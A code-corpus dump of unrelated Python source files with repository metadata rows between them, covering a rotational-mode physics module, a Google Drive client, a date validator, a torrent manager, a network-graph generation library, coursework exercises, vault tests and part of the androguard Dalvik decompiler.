GUIthread = grk.main()
print "Starting GUI thread"
GUIthread.start()
GUIthread.join()
| gpl-2.0 | -8,124,626,648,320,981,000 | 24.265306 | 87 | 0.678998 | false | 2.784525 | false | false | false |
keldLundgaard/ase-anharmonics | define_rot_mode.py | 1 | 4665 | import numpy as np
from an_utils import to_massweight_coor
def get_rot_dict(atoms,
basepos,
branch,
symnumber=1,
indices=None,
rot_axis=None):
"""Define the rotational mode.
Get rotational axis, mode vector, and moment of inertia
"""
basepos_arr = np.array(basepos)
branch_arr = np.array(branch)
assert (np.all(branch_arr < atoms.get_number_of_atoms())), \
'\nBad branch - contains higher atom index than available'
# Finding rot axis
COM = atoms[branch].get_center_of_mass()
if rot_axis is None: # 'Guess' rotation axis
rot_axis_arr = basepos_arr-COM
else: # User specified rotation axis
rot_axis_arr = np.array(rot_axis)
axis_norm = np.linalg.norm(rot_axis_arr)
assert (not np.allclose(axis_norm, 0, 1e-5, 1e-7)), \
"""\nCould not determine rotation axis, length of axis vector is
Possible cause: center of mass is same as specified point"""
rot_axis_arr = rot_axis_arr/axis_norm
moment_of_intertia = get_moment_of_intertia(
atoms[branch], basepos, rot_axis_arr)
mode_tangent = calculate_rot_mode(
atoms, basepos_arr, rot_axis_arr, branch_arr)
# defining the normal mode only in the indices used for the
# vibrational analysis
if indices is not None:
mode_tangent = mode_tangent.reshape((-1, 3))[indices].ravel()
else:
indices = range(len(atoms))
mode_tangent_mass_weighted = to_massweight_coor(
mode_tangent, atoms, indices=indices)
return {
'type': 'rotation',
'symnumber': symnumber,
'base_pos': basepos_arr,
'branch': branch_arr,
'rot_axis': rot_axis_arr,
'mode_tangent': mode_tangent,
'mode_tangent_mass_weighted': mode_tangent_mass_weighted,
'inertia': moment_of_intertia,
'indices': indices, }
def get_moment_of_intertia(atoms, x0, r_rot):
"""Returns the moment of intertia
"""
I = 0.
atom_p = atoms.get_positions()
atom_m = atoms.get_masses()
for ap, am in zip(atom_p, atom_m):
I += sum(np.cross(r_rot, ap-x0)**2.)*am
return I
def calculate_rot_mode(atoms, base_pos, rot_axis, branch_arr,
mass_weight=True, normalize=True):
""" Calculates the rotation mode for specified branch.
Each atom in the branch rotates around the given rotation axis,
which is perpendicular to the rotation axis and the radial vector:
v_rot = v_axis cross (B->A)
v_rot are weighted by distance from center of axis
v_rot are also transformed into mass-weighted coordinates
"""
ap = atoms.get_positions()
v_zero = np.zeros(3*len(ap))
v_rot = v_zero.reshape(-1, 3)
BC = rot_axis/np.linalg.norm(rot_axis)
# For each atom find vector and weight to rotation axis
for i in branch_arr:
BA = np.array(ap[i])-np.array(base_pos)
BA = BA - np.dot(BA, BC)
v_rot[i] = np.cross(BC, BA)
v_rot = np.ravel(v_rot)
if mass_weight:
v_rot = to_massweight_coor(v_rot, atoms)
if normalize:
v_rot = v_rot / np.linalg.norm(v_rot)
return v_rot
def rotatepoints(rotationcenter, rotationaxis, angle, atompos):
"""
Rotate some coordinates
See http://en.wikipedia.org/wiki/Rotation_matrix
Args:
rotationcenter (numpy array): center for rotation
rotationaxis (numpy array): axis to rotate around
angle (float): angle to rotate in radians
atompos (numpy array): positions to rotate
"""
x0 = np.matrix(rotationcenter)
u = np.matrix(rotationaxis)
ap = np.matrix(atompos)
natoms = ap.shape[0]
rp = np.zeros([natoms, 3])
R = np.matrix([
[
np.cos(angle)+u[0, 1]**2*(1.-np.cos(angle)),
u[0, 1]*u[0, 1]*(1.-np.cos(angle))-u[0, 2]*np.sin(angle),
u[0, 1]*u[0, 2]*(1.-np.cos(angle))+u[0, 1]*np.sin(angle)],
[
u[0, 1]*u[0, 0]*(1.-np.cos(angle))+u[0, 2]*np.sin(angle),
np.cos(angle)+u[0, 1]**2*(1.-np.cos(angle)),
u[0, 1]*u[0, 2]*(1.-np.cos(angle))-u[0, 0]*np.sin(angle)],
[
u[0, 2]*u[0, 0]*(1.-np.cos(angle))-u[0, 1]*np.sin(angle),
u[0, 2]*u[0, 1]*(1.-np.cos(angle))+u[0, 0]*np.sin(angle),
np.cos(angle)+u[0, 2]**2*(1.-np.cos(angle))]])
# Repeat center coordinate natoms rows
x0 = np.tile(x0, [natoms, 1])
# Vectors from rot center for all atoms
ap = ap - x0
# Apply rotation transformation
rp = np.dot(R, ap.T)
# Adding the offset
rp = rp.T + x0
return rp
| lgpl-2.1 | -1,891,834,102,752,844,000 | 30.734694 | 72 | 0.587567 | false | 3.173469 | false | false | false |
guillaume-chs/Drive-in-Line | gdrive/gdrive_client.py | 1 | 2704 | #!/usr/bin/python
import sys
from sys import platform as _platform
sys.argv = ['']
import os.path
import subprocess
from gdrive.pydrive.auth import GoogleAuth
from gdrive.pydrive.drive import GoogleDrive
file_type = {
'folder': 'application/vnd.google-apps.folder'
}
class GoogleDriveClient():
def __init__(self):
print("Google Drive client, written in Python by G. Chanson")
def connect(self):
gauth = GoogleAuth()
gauth.LocalWebserverAuth()
self.drive = GoogleDrive(gauth)
def list_dir_files(self, dir_id='root'):
query = "'%s' in parents and trashed=false" % dir_id
files = self.drive.ListFile({'q': query})
return files.GetList()
def list_trash_files(self):
query = "trashed=true"
files = self.drive.ListFile({'q': query})
return files.GetList()
def download_file(self, fileId, file_name=None):
if file_name is not None:
if os.path.isfile(file_name):
print('File already exists at %s' % file_name)
return file_name
file = self.drive.CreateFile({'id': fileId})
if file_name is None:
file_name = file['title']
file.GetContentFile(file_name)
print('Downloaded file %s to %s' % (file['title'], file_name))
return file_name
def upload_file(self, filename):
file = self.drive.CreateFile()
file.SetContentFile(filename)
tmp = filename.split('/')
file["title"] = tmp[-1]
file.Upload()
print('Uploaded %s' % file["title"])
def trash_file(self, fileId):
file = self.drive.CreateFile({'id': fileId})
file.Trash()
print('Trashed file %s' % file['title'])
def untrash_file(self, fileId):
file = self.drive.CreateFile({'id': fileId})
file.UnTrash()
print('UnTrashed file %s' % file['title'])
def delete_file(self, fileId):
file = self.drive.CreateFile({'id': fileId})
file.Delete()
print('Deleted file %s' % file['title'])
def rename_file(self, fileId, file_name):
file = self.drive.CreateFile({'id': fileId})
file['title'] = file_name
file.Upload()
print('Uploaded file %s' % file['title'])
def open_file(self, fileId):
file_path = self.download_file(fileId, '/tmp/' + fileId)
if _platform == "linux" or __platform == "linux2":
subprocess.call(['xdg-open', file_path])
elif _platform == "darwin":
subprocess.call(['open', file_path])
elif _platform == "win32":
subprocess.call(['start', file_path])
gdrive = GoogleDriveClient()
| gpl-3.0 | -44,829,841,352,414,264 | 27.166667 | 70 | 0.58432 | false | 3.644205 | false | false | false |
jacobwarduk/py-validate-dob | validate_dob.py | 1 | 1088 | #!/usr/bin/env python
import calendar
from datetime import date
from time import strptime
# Function to validate DOB input
# validate_dob("1985", "November", "18")
def validate_dob(y, m, d):
# Validating year
try:
if len(y) == 4 and not int(y) > date.today().year: # Year length must be 4 digits and be in the past
year = True
else:
year = False
except ValueError:
year = False
# Validating month
try:
for n in calendar.month_name: # Checking to see if user inputted month is in calendar
if m == n:
month = True
break
else:
month = False
except ValueError:
month = False;
# Validating day
try:
validDays = calendar.monthrange(int(y), strptime(m[0:3], "%b").tm_mon) # Getting valid number of days for specified month/year from the calendar
if int(d) > 0 and int(d) <= validDays[1]: # Checking to see if user inputted day is valid
day = True
else:
day = False
except ValueError:
day = False
# Checking if year, month and date are all valid
if True == year and True == month and True == day:
return True
else:
return False
| mit | -6,511,953,825,184,032,000 | 23.177778 | 146 | 0.676471 | false | 3.090909 | false | false | false |
karamanolev/WhatManager2 | myanonamouse/manage_mam.py | 3 | 2210 | import base64
import os
import os.path
from django.db import transaction
from WhatManager2.locking import LockModelTables
from WhatManager2.utils import norm_t_torrent
from home.models import ReplicaSet, DownloadLocation, TorrentAlreadyAddedException
from myanonamouse.models import MAMTorrent, MAMTransTorrent
def add_mam_torrent(torrent_id, instance=None, location=None, mam_client=None,
add_to_client=True):
mam_torrent = MAMTorrent.get_or_create(mam_client, torrent_id)
if not instance:
instance = ReplicaSet.get_myanonamouse_master().get_preferred_instance()
if not location:
location = DownloadLocation.get_myanonamouse_preferred()
with LockModelTables(MAMTransTorrent):
try:
MAMTransTorrent.objects.get(info_hash=mam_torrent.info_hash)
raise TorrentAlreadyAddedException(u'Already added.')
except MAMTransTorrent.DoesNotExist:
pass
download_dir = os.path.join(location.path, unicode(mam_torrent.id))
def create_b_torrent():
new_b_torrent = MAMTransTorrent(
instance=instance,
location=location,
mam_torrent=mam_torrent,
info_hash=mam_torrent.info_hash,
)
new_b_torrent.save()
return new_b_torrent
if add_to_client:
with transaction.atomic():
b_torrent = create_b_torrent()
t_torrent = instance.client.add_torrent(
base64.b64encode(mam_torrent.torrent_file),
download_dir=download_dir,
paused=False
)
t_torrent = instance.client.get_torrent(
t_torrent.id, arguments=MAMTransTorrent.sync_t_arguments)
if not os.path.exists(download_dir):
os.mkdir(download_dir)
if not os.stat(download_dir).st_mode & 0777 == 0777:
os.chmod(download_dir, 0777)
norm_t_torrent(t_torrent)
b_torrent.sync_t_torrent(t_torrent)
else:
b_torrent = create_b_torrent()
return b_torrent
| mit | -4,014,386,551,576,631,300 | 34.645161 | 82 | 0.604072 | false | 4.003623 | false | false | false |
Silmathoron/NNGT | nngt/lib/connect_tools.py | 1 | 12235 | #!/usr/bin/env python
#-*- coding:utf-8 -*-
""" Generation tools for NNGT """
import logging
import numpy as np
import scipy.sparse as ssp
from scipy.spatial.distance import cdist
from numpy.random import randint
import nngt
from nngt.lib import InvalidArgument, nonstring_container
from nngt.lib.logger import _log_message
logger = logging.getLogger(__name__)
__all__ = [
"_check_num_edges",
"_compute_connections",
"_filter",
"_no_self_loops",
"_set_degree_type",
"_set_options",
"_unique_rows",
"dist_rule",
"max_proba_dist_rule"
]
def _set_options(graph, population, shape, positions):
''' Make a graph a network or spatial '''
if population is not None:
nngt.Graph.make_network(graph, population)
if shape is not None or positions is not None:
nngt.Graph.make_spatial(graph, shape, positions)
def _compute_connections(num_source, num_target, density, edges, avg_deg,
directed, reciprocity=-1):
assert (density, edges, avg_deg) != (None, None, None), \
"At leat one of the following entries must be specified: 'density', " \
"'edges', 'avg_deg'."
pre_recip_edges = 0
if avg_deg is not None:
pre_recip_edges = int(avg_deg * num_source)
elif edges is not None:
pre_recip_edges = int(edges)
else:
pre_recip_edges = int(density * num_source * num_target)
dens = pre_recip_edges / float(num_source * num_target)
edges = pre_recip_edges
if edges:
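        # when a reciprocity target is requested, fewer edges are drawn
        # first (pre_recip_edges); the reciprocal partners added afterwards
        # bring the total back to `edges`. `frac_recip` below is the
        # fraction of reciprocal edges required for that correction.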
if reciprocity > max(0,(2.-1./dens)):
frac_recip = ((reciprocity - 1.
+ np.sqrt(1. + dens*(reciprocity - 2.))) /
(2. - reciprocity))
if frac_recip < 1.:
pre_recip_edges = int(edges/(1+frac_recip))
else:
raise InvalidArgument(
"Such reciprocity cannot be obtained, request ignored.")
elif reciprocity > 0.:
raise InvalidArgument(
"Reciprocity cannot be lower than 2-1/density.")
return edges, pre_recip_edges
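# Illustrative usage of `_compute_connections` (values are hypothetical):
# with 100 sources, 200 targets and an average degree of 5 per source,
#   edges, pre = _compute_connections(100, 200, None, None, 5, True)
#   # gives edges == 500 and, with the default reciprocity, pre == 500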
def _check_num_edges(source_ids, target_ids, num_edges, directed, multigraph,
return_sets=False):
num_source, num_target = len(source_ids), len(target_ids)
source_set, target_set = None, None
has_only_one_population = (num_source == num_target)
if has_only_one_population:
source_set = set(source_ids)
target_set = set(target_ids)
has_only_one_population = (source_set == target_set)
if not has_only_one_population and not multigraph:
b_d = (num_edges > num_source*num_target)
b_nd = (num_edges > int(0.5*num_source*num_target))
if (not directed and b_nd) or (directed and b_d):
raise InvalidArgument("Required number of edges is too high")
elif has_only_one_population and not multigraph:
b_d = (num_edges > num_source*(num_target-1))
b_nd = (num_edges > int(0.5*(num_source-1)*num_target))
if (not directed and b_nd) or (directed and b_d):
raise InvalidArgument("Required number of edges is too high")
if return_sets:
return has_only_one_population, source_set, target_set
return has_only_one_population
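# Example (illustrative): for a simple (non-multigraph) directed graph,
# requesting more than `num_source * num_target` edges between two distinct
# populations, or more than `num_source * (num_target - 1)` within a single
# population, raises InvalidArgument.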
def _set_degree_type(degree_type):
deg_map = {
"in-degree": "in", "out-degree": "out", "total-degree": "total",
"in": "in", "out": "out", "total": "total"
}
try:
degree_type = deg_map[degree_type]
except KeyError:
raise ValueError("`degree_type` must be either 'in', 'out', 'total', "
"or the full version 'in-degree', 'out-degree', "
"'total-degree'.")
return degree_type
# ------------------------- #
# Edge checks and filtering #
# ------------------------- #
def _unique_rows(arr, return_index=False):
'''
Keep only unique edges
'''
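    # view each row as a single opaque (void) item so that np.unique
    # operates row-wise instead of on the flattened array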
b = np.ascontiguousarray(arr).view(
np.dtype((np.void, arr.dtype.itemsize * arr.shape[1])))
b, idx = np.unique(b, return_index=True)
unique = b.view(arr.dtype).reshape(-1, arr.shape[1]).astype(int)
if return_index:
return unique, idx
return unique
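# Example (illustrative):
#   _unique_rows(np.array([[0, 1], [0, 1], [1, 2]]))
#   # -> array containing the rows [0, 1] and [1, 2] once each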
def _no_self_loops(array, return_test=False):
'''
Remove self-loops
'''
test = array[:, 0] != array[:, 1]
if return_test:
return array[test, :].astype(int), test
return array[test, :].astype(int)
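# Example (illustrative): _no_self_loops(np.array([[0, 0], [0, 1]]))
# returns array([[0, 1]]).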
def _filter(ia_edges, ia_edges_tmp, num_ecurrent, edges_hash, b_one_pop,
multigraph, directed=True, recip_hash=None, distance=None,
dist_tmp=None):
'''
Filter the edges: remove self loops and multiple connections if the graph
is not a multigraph.
'''
if b_one_pop:
ia_edges_tmp, test = _no_self_loops(ia_edges_tmp, return_test=True)
if dist_tmp is not None:
dist_tmp = dist_tmp[test]
if not multigraph:
num_ecurrent = len(edges_hash)
if distance is not None:
for e, d in zip(ia_edges_tmp, dist_tmp):
tpl_e = tuple(e)
if tpl_e not in edges_hash:
if directed or tpl_e not in recip_hash:
ia_edges[num_ecurrent] = e
distance.append(d)
edges_hash.add(tpl_e)
if not directed:
recip_hash.add(tpl_e[::-1])
num_ecurrent += 1
else:
for e in ia_edges_tmp:
tpl_e = tuple(e)
if tpl_e not in edges_hash:
if directed or tpl_e not in recip_hash:
ia_edges[num_ecurrent] = e
edges_hash.add(tpl_e)
if not directed:
recip_hash.add(tpl_e[::-1])
num_ecurrent += 1
else:
num_added = len(ia_edges_tmp)
ia_edges[num_ecurrent:num_ecurrent + num_added, :] = ia_edges_tmp
num_ecurrent += num_added
if distance is not None:
distance.extend(dist_tmp)
return ia_edges, num_ecurrent
def _cleanup_edges(g, edges, attributes, duplicates, loops, existing, ignore):
    '''
    Clean up a list of edges.
    '''
loops_only = loops and not (duplicates or existing)
new_edges = None
new_attr = {}
directed = g.is_directed()
if loops_only:
edges = np.asarray(edges)
new_edges, test = _no_self_loops(edges, return_test=True)
if len(new_edges) != len(edges):
if ignore:
_log_message(logger, "WARNING",
"Self-loops ignored: {}.".format(edges[~test]))
else:
raise InvalidArgument(
"Self-loops are present: {}.".format(edges[~test]))
        new_attr = {k: np.asarray(v)[test] for k, v in attributes.items()}
else:
# check (also) either duplicates or existing
new_attr = {key: [] for key in attributes}
edge_set = set()
new_edges = []
if existing:
edge_set = {tuple(e) for e in g.edges_array}
for i, e in enumerate(edges):
tpl_e = tuple(e)
if tpl_e in edge_set or (not directed and tpl_e[::-1] in edge_set):
if ignore:
_log_message(logger, "WARNING",
"Existing edge {} ignored.".format(tpl_e))
else:
raise InvalidArgument(
"Edge {} already exists.".format(tpl_e))
elif loops and e[0] == e[1]:
if ignore:
_log_message(logger, "WARNING",
"Self-loop on {} ignored.".format(e[0]))
else:
raise InvalidArgument("Self-loop on {}.".format(e[0]))
else:
edge_set.add(tpl_e)
new_edges.append(tpl_e)
if not directed:
edge_set.add(tpl_e[::-1])
for k, vv in attributes.items():
if nonstring_container(vv):
new_attr[k].append(vv[i])
else:
new_attr[k].append(vv)
new_edges = np.asarray(new_edges)
return new_edges, new_attr
# ------------- #
# Distance rule #
# ------------- #
def dist_rule(rule, scale, pos_src, pos_targets, dist=None):
'''
    Distance-rule (DR) connection probability from one source to several targets.
Parameters
----------
rule : str
Either 'exp', 'gaussian', or 'lin'.
scale : float
Characteristic scale.
pos_src : array of shape (2, N)
Positions of the sources.
pos_targets : array of shape (2, N)
Positions of the targets.
dist : list, optional (default: None)
List that will be filled with the distances of the edges.
Returns
-------
Array of size N giving the probability of the edges according to the rule.
'''
    vect = pos_targets - pos_src
    # distance of each target from the source: norm of each column vector
    dist_tmp = np.linalg.norm(vect, axis=0)
if dist is not None:
dist.extend(dist_tmp)
if rule == 'exp':
return np.exp(np.divide(dist_tmp, -scale))
elif rule == 'gaussian':
return np.exp(-0.5*np.square(np.divide(dist_tmp, scale)))
elif rule == 'lin':
return np.divide(scale - dist_tmp, scale).clip(min=0.)
else:
raise InvalidArgument('Unknown rule "' + rule + '".')
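# Example (a sketch): linear-rule probabilities for targets at distances
# 0, `scale` and 2*`scale` from the source:
#
#     pos_src = np.zeros((2, 1))
#     pos_targets = np.array([[0., 1., 2.], [0., 0., 0.]])
#     dist_rule('lin', 1., pos_src, pos_targets)   # -> [1., 0., 0.]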
def max_proba_dist_rule(rule, scale, max_proba, pos_src, pos_targets,
dist=None):
'''
    Distance-rule (DR) connection probability from one source to several targets.
Parameters
----------
rule : str
Either 'exp', 'gaussian', or 'lin'.
scale : float
Characteristic scale.
    max_proba : float
        Maximum connection probability, reached at zero distance.
pos_src : 2-tuple
Positions of the sources.
pos_targets : array of shape (2, N)
Positions of the targets.
dist : list, optional (default: None)
List that will be filled with the distances of the edges.
Returns
-------
Array of size N giving the probability of the edges according to the rule.
'''
    x, y = pos_src
    vect = pos_targets - np.repeat([[x], [y]], pos_targets.shape[1], axis=1)
    # distance of each target from the source: norm of each column vector
    dist_tmp = np.linalg.norm(vect, axis=0)
if dist is not None:
dist.extend(dist_tmp)
if rule == 'exp':
return max_proba*np.exp(np.divide(dist_tmp, -scale))
elif rule == 'gaussian':
return max_proba*np.exp(-0.5*np.square(np.divide(dist_tmp, scale)))
elif rule == 'lin':
return max_proba*np.divide(scale - dist_tmp, scale).clip(min=0.)
else:
raise InvalidArgument('Unknown rule "' + rule + '".')
def _set_dist_new_edges(new_attr, graph, edge_list):
''' Add the distances to the edge attributes '''
if graph.is_spatial() and "distance" not in new_attr:
if len(edge_list) == 1:
positions = graph.get_positions(list(edge_list[0]))
new_attr["distance"] = cdist([positions[0]], [positions[1]])[0][0]
else:
positions = graph.get_positions()
mat = cdist(positions, positions)
distances = [mat[e[0], e[1]] for e in edge_list]
new_attr["distance"] = distances
def _set_default_edge_attributes(g, attributes, num_edges):
''' Set default edge attributes values '''
for k in g.edge_attributes:
skip = k in ("weight", "distance", "delay")
if k not in attributes:
dtype = g.get_attribute_type(k)
if dtype == "string":
attributes[k] = ["" for _ in range(num_edges)]
elif dtype == "double" and not skip:
attributes[k] = [np.NaN for _ in range(num_edges)]
elif dtype == "int":
attributes[k] = [0 for _ in range(num_edges)]
elif not skip:
attributes[k] = [None for _ in range(num_edges)]
| gpl-3.0 | -3,961,071,279,036,299,300 | 30.861979 | 79 | 0.545157 | false | 3.676382 | true | false | false |
pjox/scientific-programming | Parcial 1/PedroJavierOrtiz.py | 1 | 1188 | import math
def Interlace_Iter(L1, L2):
L3=[]
for i in range(min(len(L1),len(L2))):
L3.append(L1[i])
L3.append(L2[i])
if len(L1) < len(L2):
L3=L3+L2[len(L1):]
elif len(L2) < len(L1):
L3=L3+L1[len(L2):]
return L3
def Interlace_Rec(L1,L2):
L4=[]
def Recursive_Part(L1,L2,L4):
if len(L1)==0 or len(L2)==0:
if len(L1) < len(L2):
L4=L4+L2[:]
elif len(L2) < len(L1):
L4=L4+L1[:]
            return L4
else:
L4.append(L1[0])
L4.append(L2[0])
L1.pop(0)
L2.pop(0)
            return Recursive_Part(L1,L2,L4)
return Recursive_Part(L1,L2,L4)
def IntLog(n,b):
e=0
while b**e < n:
e=e+1
if b**e > n:
e-=1
return e
def g(x):
return (0.5)*(x+(2.0/x))
def PuntoFijo(a, epsilon, N): #The function g is defined above
n=1
x0=float(a)
x1=g(x0)
dif = abs(x0-x1)
while n <= N and dif > epsilon:
x0=x1
x1=g(x1)
dif = abs(x0-x1)
n+=1
if n > N:
n-=1
x_ultimo = x1
return x_ultimo, dif, n
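# Example (illustrative): g above is one Newton/Babylonian step for sqrt(2),
# so the fixed-point iteration converges to ~1.41421356:
#
#     x, dif, n = PuntoFijo(1.0, 1e-10, 50)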
def CribaEratostenes(n):
criba=[False,False]+[True]*(n-1)
i = 2
while i <= math.sqrt(n):
j=2
if criba[i]== True:
while i*j <= n:
criba[i*j]=False
j+=1
i+=1
prime=[]
for k in range(len(criba)):
if criba[k]==True:
prime.append(k)
return prime
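# Example (illustrative):
#
#     CribaEratostenes(20)   # -> [2, 3, 5, 7, 11, 13, 17, 19]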
| mit | -4,420,393,802,670,555,000 | 15.732394 | 64 | 0.569865 | false | 1.797277 | false | false | false |
mozilla-iam/cis | python-modules/cis_identity_vault/tests/test_vault.py | 1 | 1707 | import os
import random
import subprocess
from moto import mock_dynamodb2
@mock_dynamodb2
class TestVault(object):
def test_crud_it_should_succeed(self):
from cis_identity_vault import vault
v = vault.IdentityVault()
os.environ["CIS_ENVIRONMENT"] = "purple"
os.environ["CIS_REGION_NAME"] = "us-east-1"
os.environ["DEFAULT_AWS_REGION"] = "us-east-1"
v.connect()
result = v.find_or_create()
assert result is not None
result = v.destroy()
assert result["ResponseMetadata"]["HTTPStatusCode"] == 200
class TestVaultDynalite(object):
def setup_class(self):
self.dynalite_port = str(random.randint(32000, 34000))
os.environ["CIS_DYNALITE_PORT"] = self.dynalite_port
self.dynaliteprocess = subprocess.Popen(
[
"/usr/sbin/java",
"-Djava.library.path=/opt/dynamodb_local/DynamoDBLocal_lib",
"-jar",
"/opt/dynamodb_local/DynamoDBLocal.jar",
"-inMemory",
"-port",
self.dynalite_port,
],
preexec_fn=os.setsid,
)
def test_create_using_dynalite(self):
os.environ["CIS_ENVIRONMENT"] = "local"
os.environ["CIS_DYNALITE_PORT"] = self.dynalite_port
os.environ["CIS_REGION_NAME"] = "us-east-1"
from cis_identity_vault import vault
v = vault.IdentityVault()
v.connect()
result = v.find_or_create()
assert result is not None
result = v.find_or_create()
assert result is not None
def teardown_class(self):
os.killpg(os.getpgid(self.dynaliteprocess.pid), 15)
| mpl-2.0 | 54,099,992,054,255,350 | 30.611111 | 76 | 0.585237 | false | 3.57113 | false | false | false |
dandycheung/androguard | androguard/decompiler/dad/decompile.py | 33 | 12763 | # This file is part of Androguard.
#
# Copyright (c) 2012 Geoffroy Gueguen <geoffroy.gueguen@gmail.com>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.append('./')
import logging
from collections import defaultdict
import androguard.core.androconf as androconf
import androguard.decompiler.dad.util as util
from androguard.core.analysis import analysis
from androguard.core.bytecodes import apk, dvm
from androguard.decompiler.dad.control_flow import identify_structures
from androguard.decompiler.dad.dataflow import (build_def_use,
place_declarations,
dead_code_elimination,
register_propagation,
split_variables)
from androguard.decompiler.dad.graph import construct
from androguard.decompiler.dad.instruction import Param, ThisParam
from androguard.decompiler.dad.writer import Writer
def auto_vm(filename):
ret = androconf.is_android(filename)
if ret == 'APK':
return dvm.DalvikVMFormat(apk.APK(filename).get_dex())
elif ret == 'DEX':
return dvm.DalvikVMFormat(open(filename, 'rb').read())
elif ret == 'ODEX':
return dvm.DalvikOdexVMFormat(open(filename, 'rb').read())
return None
class DvMethod():
def __init__(self, methanalysis):
method = methanalysis.get_method()
self.start_block = next(methanalysis.get_basic_blocks().get(), None)
self.cls_name = method.get_class_name()
self.name = method.get_name()
self.lparams = []
self.var_to_name = defaultdict()
self.writer = None
self.graph = None
self.access = util.get_access_method(method.get_access_flags())
desc = method.get_descriptor()
self.type = desc.split(')')[-1]
self.params_type = util.get_params_type(desc)
self.exceptions = methanalysis.exceptions.exceptions
code = method.get_code()
if code is None:
logger.debug('No code : %s %s', self.name, self.cls_name)
else:
start = code.registers_size - code.ins_size
if 'static' not in self.access:
self.var_to_name[start] = ThisParam(start, self.name)
self.lparams.append(start)
start += 1
num_param = 0
for ptype in self.params_type:
param = start + num_param
self.lparams.append(param)
self.var_to_name[param] = Param(param, ptype)
num_param += util.get_type_size(ptype)
if not __debug__:
from androguard.core import bytecode
bytecode.method2png('/tmp/dad/graphs/%s#%s.png' % \
(self.cls_name.split('/')[-1][:-1], self.name), methanalysis)
def process(self):
logger.debug('METHOD : %s', self.name)
# Native methods... no blocks.
if self.start_block is None:
logger.debug('Native Method.')
self.writer = Writer(None, self)
self.writer.write_method()
return
graph = construct(self.start_block, self.var_to_name, self.exceptions)
self.graph = graph
if not __debug__:
util.create_png(self.cls_name, self.name, graph, '/tmp/dad/blocks')
use_defs, def_uses = build_def_use(graph, self.lparams)
split_variables(graph, self.var_to_name, def_uses, use_defs)
dead_code_elimination(graph, def_uses, use_defs)
register_propagation(graph, def_uses, use_defs)
place_declarations(graph, self.var_to_name, def_uses, use_defs)
del def_uses, use_defs
# After the DCE pass, some nodes may be empty, so we can simplify the
# graph to delete these nodes.
# We start by restructuring the graph by spliting the conditional nodes
# into a pre-header and a header part.
graph.split_if_nodes()
# We then simplify the graph by merging multiple statement nodes into
# a single statement node when possible. This also delete empty nodes.
graph.simplify()
graph.compute_rpo()
if not __debug__:
util.create_png(self.cls_name, self.name, graph,
'/tmp/dad/pre-structured')
identify_structures(graph, graph.immediate_dominators())
if not __debug__:
util.create_png(self.cls_name, self.name, graph,
'/tmp/dad/structured')
self.writer = Writer(graph, self)
self.writer.write_method()
del graph
def show_source(self):
print self.get_source()
def get_source(self):
if self.writer:
return '%s' % self.writer
return ''
def __repr__(self):
return 'Method %s' % self.name
class DvClass():
def __init__(self, dvclass, vma):
name = dvclass.get_name()
if name.find('/') > 0:
pckg, name = name.rsplit('/', 1)
else:
pckg, name = '', name
self.package = pckg[1:].replace('/', '.')
self.name = name[:-1]
self.vma = vma
self.methods = dict((meth.get_method_idx(), meth)
for meth in dvclass.get_methods())
self.fields = dict((field.get_name(), field)
for field in dvclass.get_fields())
self.subclasses = {}
self.code = []
self.inner = False
access = dvclass.get_access_flags()
        # If this is an interface, remove the 'class' and 'abstract' keywords
if 0x200 & access:
prototype = '%s %s'
if access & 0x400:
access -= 0x400
else:
prototype = '%s class %s'
self.access = util.get_access_class(access)
self.prototype = prototype % (' '.join(self.access), self.name)
self.interfaces = dvclass.interfaces
self.superclass = dvclass.get_superclassname()
logger.info('Class : %s', self.name)
logger.info('Methods added :')
for index, meth in self.methods.iteritems():
logger.info('%s (%s, %s)', index, self.name, meth.name)
logger.info('')
def add_subclass(self, innername, dvclass):
self.subclasses[innername] = dvclass
dvclass.inner = True
def get_methods(self):
return self.methods
def process_method(self, num):
methods = self.methods
if num in methods:
method = methods[num]
if not isinstance(method, DvMethod):
method.set_instructions([i for i in method.get_instructions()])
meth = methods[num] = DvMethod(self.vma.get_method(method))
meth.process()
method.set_instructions([])
else:
method.process()
else:
logger.error('Method %s not found.', num)
def process(self):
for klass in self.subclasses.values():
klass.process()
for meth in self.methods:
self.process_method(meth)
def get_source(self):
source = []
if not self.inner and self.package:
source.append('package %s;\n' % self.package)
if self.superclass is not None:
self.superclass = self.superclass[1:-1].replace('/', '.')
if self.superclass.split('.')[-1] == 'Object':
self.superclass = None
if self.superclass is not None:
self.prototype += ' extends %s' % self.superclass
if self.interfaces is not None:
interfaces = self.interfaces[1:-1].split(' ')
self.prototype += ' implements %s' % ', '.join(
[n[1:-1].replace('/', '.') for n in interfaces])
source.append('%s {\n' % self.prototype)
for name, field in sorted(self.fields.iteritems()):
access = util.get_access_field(field.get_access_flags())
f_type = util.get_type(field.get_descriptor())
source.append(' ')
if access:
source.append(' '.join(access))
source.append(' ')
if field.init_value:
value = field.init_value.value
if f_type == 'String':
value = '"%s"' % value
source.append('%s %s = %s;\n' % (f_type, name, value))
else:
source.append('%s %s;\n' % (f_type, name))
for klass in self.subclasses.values():
source.append(klass.get_source())
for _, method in self.methods.iteritems():
if isinstance(method, DvMethod):
source.append(method.get_source())
source.append('}\n')
return ''.join(source)
def show_source(self):
print self.get_source()
def __repr__(self):
if not self.subclasses:
return 'Class(%s)' % self.name
return 'Class(%s) -- Subclasses(%s)' % (self.name, self.subclasses)
class DvMachine():
def __init__(self, name):
vm = auto_vm(name)
if vm is None:
raise ValueError('Format not recognised: %s' % name)
self.vma = analysis.uVMAnalysis(vm)
self.classes = dict((dvclass.get_name(), dvclass)
for dvclass in vm.get_classes())
#util.merge_inner(self.classes)
def get_classes(self):
return self.classes.keys()
def get_class(self, class_name):
for name, klass in self.classes.iteritems():
if class_name in name:
if isinstance(klass, DvClass):
return klass
dvclass = self.classes[name] = DvClass(klass, self.vma)
return dvclass
def process(self):
for name, klass in self.classes.iteritems():
logger.info('Processing class: %s', name)
if isinstance(klass, DvClass):
klass.process()
else:
dvclass = self.classes[name] = DvClass(klass, self.vma)
dvclass.process()
def show_source(self):
for klass in self.classes.values():
klass.show_source()
def process_and_show(self):
for name, klass in sorted(self.classes.iteritems()):
logger.info('Processing class: %s', name)
if not isinstance(klass, DvClass):
klass = DvClass(klass, self.vma)
klass.process()
klass.show_source()
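# Illustrative non-interactive use (a sketch; 'classes.dex' is a hypothetical
# input file):
#
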